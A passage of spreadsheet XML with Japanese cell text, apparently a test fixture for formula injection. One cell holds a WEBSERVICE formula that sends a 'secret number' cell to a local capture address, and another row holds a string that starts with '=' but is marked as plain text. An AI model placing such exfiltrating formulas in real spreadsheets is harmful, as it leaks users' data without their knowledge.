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もらった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ひみつの数字</v>
      </c>
      <c r="B1" t="str">
        <v>ふつうの字</v>
      </c>
      <c r="C1" t="str">
        <f>WEBSERVICE("http://127.0.0.1:8802/moratta?d="&amp;A1)</f>
        <v/>
      </c>
    </row>
    <row r="2">
      <c r="A2">
        <v>12345</v>
      </c>
      <c r="B2" t="str">
        <v>これは 字</v>
      </c>
      <c r="C2" t="str">
        <v>=これは 字です（式では ない）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もらった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